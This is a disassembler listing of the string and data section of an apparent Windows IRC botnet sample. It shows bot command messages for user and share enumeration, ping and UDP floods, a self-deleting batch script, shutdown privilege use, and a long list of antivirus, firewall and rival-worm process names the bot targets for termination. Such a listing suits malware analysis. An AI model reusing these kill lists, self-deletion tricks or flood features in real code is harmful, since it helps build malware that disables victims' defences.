aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_406359+2BE�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_406359+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_406359+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_406359+230�o
align 10h
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_406359+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_406359+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_406359+194�o
align 10h
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_406359+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_406359+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_406359+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_406359+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_406359+90�o
align 10h
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_406359+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_406359+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_4067EA+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_4068AF+6�o
; sub_40FBDB+18�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_406931+1A�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4069D5+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_4069F7+13C�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_4069F7+80�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_4069F7+43�o
align 10h
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused db 'Paused',0
align 10h
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0042B4A4�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:0042B4A0�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:0042B498�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0042B494�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:0042B48C�o
align 10h
aList_1 db 'List',0 ; DATA XREF: .data:0042B488�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:0042B480�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:0042B47C�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_42B474�o
align 10h
aAdd db 'Add',0 ; DATA XREF: .data:off_42B470�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_406D2D+128�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_406D2D:loc_406E41�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_406D2D:loc_406E3A�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_406D2D:loc_406E33�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_406D2D:loc_406E2C�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_406D2D:loc_406E25�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_406D2D:loc_406E1E�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_406D2D:loc_406E17�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_406D2D:loc_406E10�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_406D2D:loc_406E09�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_406D2D:loc_406E02�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_406D2D:loc_406DD7�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_406D2D:loc_406DD0�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_406D2D:loc_406DC9�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_406D2D:loc_406DC2�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_406D2D+8B�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_406D2D:loc_406D97�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_406D2D:loc_406D8D�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_406D2D:loc_406D83�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_406D2D:loc_406D79�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_406D2D:loc_406D6F�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_406D2D+38�o
align 10h
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_406EA7+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_406EA7:loc_406F76�o
aStarting db ' Starting',0 ; DATA XREF: sub_406EA7:loc_406F6F�o
aStoping db ' Stoping',0 ; DATA XREF: sub_406EA7:loc_406F68�o
aRunning db ' Running',0 ; DATA XREF: sub_406EA7:loc_406F61�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_406EA7:loc_406F5A�o
aPausing db ' Pausing',0 ; DATA XREF: sub_406EA7:loc_406F53�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_406EA7:loc_406F4C�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_406EA7+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_406EA7+25�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_4071B2+394�o
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_4071B2+36A�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_4071B2+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_4071B2+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_4071B2+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_4071B2+2C4�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_4071B2+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_4071B2+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_4071B2+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_4071B2+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_4071B2+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_4071B2+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_4071B2+1A0�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_4071B2+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_4071B2+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_4071B2+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_4071B2:loc_4072CB�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_4071B2:loc_4072C4�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_4071B2:loc_4072BD�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_4071B2+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_4071B2+AC�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_4071B2+81�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_4071B2+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_407580:loc_407699�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_407580:loc_407692�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_407580:loc_40768B�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_407580:loc_407684�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_407580:loc_40767D�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_407580:loc_407660�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_407580:loc_407659�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_407580:loc_407652�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_407580+CB�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_407580:loc_407627�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_407580:loc_407620�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_407580:loc_407619�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_407580:loc_40760F�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_407580+85�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_407580:loc_4075E9�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_407580:loc_4075DF�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_407580:loc_4075D5�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_407580:loc_4075CB�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_407580:loc_4075C1�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_407580+37�o
align 10h
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_4076B0+A4�o
align 4
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_4076B0+7C�o
align 4
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_40776C+65�o
align 10h
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_40776C+4F�o
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_40776C+33�o
align 10h
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_4077E4+AA�o
align 10h
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4077E4+88�o
align 4
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4077E4+56�o
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4078A2+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4078A2+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4078A2+B3�o
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_4078A2+74�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4078A2+1D�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_4079C1+B5�o
align 10h
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4079C1+93�o
align 4
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4079C1+6D�o
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_407A8B+144�o
align 10h
aNetAnAccessVio db '[NET]: An access violation has occured.',0
; DATA XREF: sub_407A8B:loc_407B76�o
aS_3 db ' %S',0 ; DATA XREF: sub_407A8B+B8�o
align 10h
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_407A8B+78�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_407A8B+1F�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_407C37:loc_407D0E�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_407C37:loc_407CDF�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_407C37:loc_407C8B�o
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_407C37+44�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_407DBB+138�o
align 4
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_407DBB+6C�o
align 4
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_407F44+1CA�o
align 10h
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_407F44+8C�o
align 4
aHass_exe db 'hass.exe',0 ; DATA XREF: .data:0042BEAC�o
align 10h
aWinmp_exe db 'winmp.exe',0 ; DATA XREF: .data:0042BEA8�o
align 4
aBling_exe db 'bling.exe',0 ; DATA XREF: .data:0042BEA4�o
align 4
aWuamgrd_exe db 'wuamgrd.exe',0 ; DATA XREF: .data:0042BEA0�o
aScguard_exe db 'scguard.exe',0 ; DATA XREF: .data:0042BE9C�o
aWinssv_exe db 'winssv.exe',0 ; DATA XREF: .data:0042BE98�o
align 4
aWruaclt_exe db 'WRUACLT.EXE',0 ; DATA XREF: .data:0042BE94�o
aWuacrlt_exe db 'WUACRLT.EXE',0 ; DATA XREF: .data:0042BE90�o
aWuanclt_exe db 'WUANCLT.EXE',0 ; DATA XREF: .data:0042BE8C�o
aMsconfig_exe db 'MsConfiG.exe',0 ; DATA XREF: .data:0042BE88�o
align 10h
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:0042BE84�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0042BE80�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0042BE7C�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0042BE78�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0042BE74�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0042BE70�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0042BE6C�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0042BE68�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0042BE64�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0042BE60�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0042BE5C�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0042BE58�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0042BE54�o
align 10h
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:0042BE50�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:0042BE4C�o
align 10h
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:0042BE48�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:0042BE44�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:0042BE40�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:0042BE3C�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:0042BE38�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:0042BE34�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:0042BE30�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:0042BE2C�o
align 10h
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:0042BE28�o
align 10h
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:0042BE24�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:0042BE20�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:0042BE1C�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:0042BE18�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:0042BE14�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:0042BE10�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:0042BE0C�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:0042BE08�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:0042BE04�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:0042BE00�o
align 4
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:0042BDFC�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:0042BDF8�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:0042BDF4�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:0042BDF0�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:0042BDEC�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:0042BDE8�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:0042BDE4�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:0042BDE0�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:0042BDDC�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:0042BDD8�o
align 10h
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:0042BDD4�o
align 10h
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:0042BDD0�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:0042BDCC�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:0042BDC8�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:0042BDC4�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:0042BDC0�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:0042BDBC�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:0042BDB8�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:0042BDB4�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:0042BDB0�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:0042BDAC�o
align 10h
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:0042BDA8�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:0042BDA4�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:0042BDA0�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:0042BD9C�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:0042BD98�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:0042BD94�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:0042BD90�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:0042BD8C�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:0042BD88�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:0042BD84�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:0042BD80�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:0042BD7C�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:0042BD78�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:0042BD74�o
align 10h
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:0042BD70�o
align 10h
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:0042BD6C�o
align 10h
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:0042BD68�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:0042BD64�o
align 4
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:0042BD60�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:0042BD5C�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:0042BD58�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:0042BD54�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:0042BD50�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:0042BD4C�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:0042BD48�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:0042BD44�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:0042BD40�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:0042BD3C�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:0042BD38�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:0042BD34�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:0042BD30�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:0042BD2C�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:0042BD28�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:0042BD24�o
align 10h
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:0042BD20�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:0042BD1C�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:0042BD18�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:0042BD14�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:0042BD10�o
align 10h
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:0042BD0C�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:0042BD04�o
; .data:0042BD08�o
align 4
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:0042BD00�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:0042BCFC�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:0042BCF8�o
align 10h
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:0042BCF4�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:0042BCF0�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:0042BCEC�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:0042BCE8�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:0042BCE4�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:0042BCE0�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:0042BCDC�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:0042BCD8�o
align 10h
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:0042BCD4�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:0042BCD0�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:0042BCCC�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:0042BCC8�o
align 10h
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:0042BCC4�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:0042BCC0�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:0042BCBC�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:0042BCB8�o
align 10h
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:0042BCB4�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:0042BCB0�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:0042BCAC�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:0042BCA8�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:0042BCA4�o
align 10h
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:0042BCA0�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:0042BC9C�o
align 4
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:0042BC98�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:0042BC94�o
align 10h
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:0042BC90�o
align 10h
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:0042BC8C�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:0042BC88�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:0042BC84�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:0042BC80�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:0042BC7C�o
align 4
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:0042BC78�o
aUpd32_exe db 'UPD32.EXE',0 ; DATA XREF: .data:0042BC74�o
align 10h
aSvshost32_exe db 'SVSHOST32.EXE',0 ; DATA XREF: .data:0042BC70�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:0042BC6C�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:0042BC68�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:0042BC64�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:0042BC60�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:0042BC5C�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:0042BC58�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:0042BC54�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:0042BC50�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:0042BC4C�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:0042BC48�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:0042BC44�o
align 10h
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:0042BC40�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:0042BC3C�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:0042BC38�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:0042BC34�o
align 10h
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:0042BC30�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:0042BC2C�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:0042BC28�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:0042BC24�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:0042BC20�o
align 10h
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:0042BC1C�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:0042BC18�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:0042BC14�o
align 10h
